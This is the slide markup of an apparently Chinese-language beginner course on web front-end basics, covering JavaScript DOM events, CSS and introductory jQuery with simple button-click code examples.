                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>按钮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    document.getElementById(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'btn'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).onclick=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>我被点击了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="灯片编号占位符 7"/>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sym typeface="+mn-ea"/>
              </a:rPr>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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="699650" y="1896866"/>
          <a:ext cx="8128864" cy="3672000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{21E4AEA4-8DFA-4A89-87EB-49C32662AFE0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2855528"/>
                <a:gridCol w="5273336"/>
              </a:tblGrid>
              <a:tr h="408000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="1219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>事件名</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="l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00B0F0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="1219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>说明</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="l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00B0F0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="408000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="13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onclick</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F4E9E9"/>
                    </a:solidFill>
                  </a:tcP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鼠标单击事件</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F4E9E9"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="408000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="13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onblur</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元素失去焦点</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tc>
              </a:tr>
              <a:tr h="408000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="13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onfocus</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F4E9E9"/>
                    </a:solidFill>
                  </a:tcP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元素获得焦点</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F4E9E9"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="408000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="13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onload</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某个页面或图像被完成加载</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tc>
              </a:tr>
              <a:tr h="408000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="13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onsubmit</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F4E9E9"/>
                    </a:solidFill>
                  </a:tcP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当表单提交时触发该事件</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F4E9E9"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="408000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="13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onkeydown</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某个键盘的键被按下</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tc>
              </a:tr>
              <a:tr h="408000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="13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onmouseover</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F4E9E9"/>
                    </a:solidFill>
                  </a:tcP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鼠标被移到某元素之上</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solidFill>
                      <a:srgbClr val="F4E9E9"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="408000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0" err="1">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onmouseout</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鼠标从某元素移开</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T="45700" marB="45700" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608210" y="1233356"/>
            <a:ext cx="10698800"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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>常见事件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>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CSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="788951" y="1426114"/>
            <a:ext cx="10402336" cy="1016806"/>
            <a:chOff x="920210" y="1823315"/>
            <a:chExt cx="10200297" cy="1016806"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 对角圆角 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="920210" y="1823317"/>
              <a:ext cx="10200297" cy="1016804"/>
            </a:xfrm>
            <a:prstGeom prst="round2DiagRect">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8511"/>
                <a:gd name="adj2" fmla="val 5767"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="6350">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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04000" bIns="0" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="360045" lvl="1" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="l"/>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CSS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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Cascading Style Sheet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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）：层叠样式表，用于控制页面的样式（表现）。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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矩形: 对角圆角 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="920210" y="1823315"/>
              <a:ext cx="1618934" cy="431800"/>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6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CSS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="788951" y="2738534"/>
            <a:ext cx="3386341" cy="3966194"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2371"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="85000"/>
                <a:lumOff val="15000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4592320" y="3429000"/>
            <a:ext cx="7268562" cy="829236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 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JQuery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184785" y="1195705"/>
            <a:ext cx="11543665" cy="5347335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Jquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>jQuery 是一个 JavaScript 库。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>jQuery 是一个轻量级的"写的少，做的多"的 JavaScript 库。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>jQuery 库包含以下功能：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>HTML 元素选取</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>HTML 元素操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>CSS 操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>HTML 事件函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>JavaScript 特效和动画</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>HTML DOM 遍历和修改</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>AJAX</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Utilities</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="259080" y="1319530"/>
            <a:ext cx="2357120" cy="5272405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2983230" y="1401445"/>
            <a:ext cx="8621395" cy="5189855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> var btn1 = document.getElementById("btn1");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> var btn2 = document.getElementById("btn2");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> var divs = document.getElementsByName("div");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> btn1.onclick = function() {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  for(var i=0; i&lt;divs.length;i++){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>   divs[i].style.display = "block";</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> };</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> btn2.onclick = function(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  for(var i=0; i&lt;divs.length;i++){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>   divs[i].innerText = "输入文本内容";</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="453390" y="1198880"/>
            <a:ext cx="2388870" cy="5577205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2973070" y="1198880"/>
            <a:ext cx="8632190" cy="5426710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> &lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  // 入口，文档准备好了才执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  $(document).ready(function(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>   console.log("dashu");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>   // 要等文档加载完才执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>   // 注册事件 click()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>   // 重复注册事件不会覆盖</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>   $("#btn1").click(function(){</a:t>
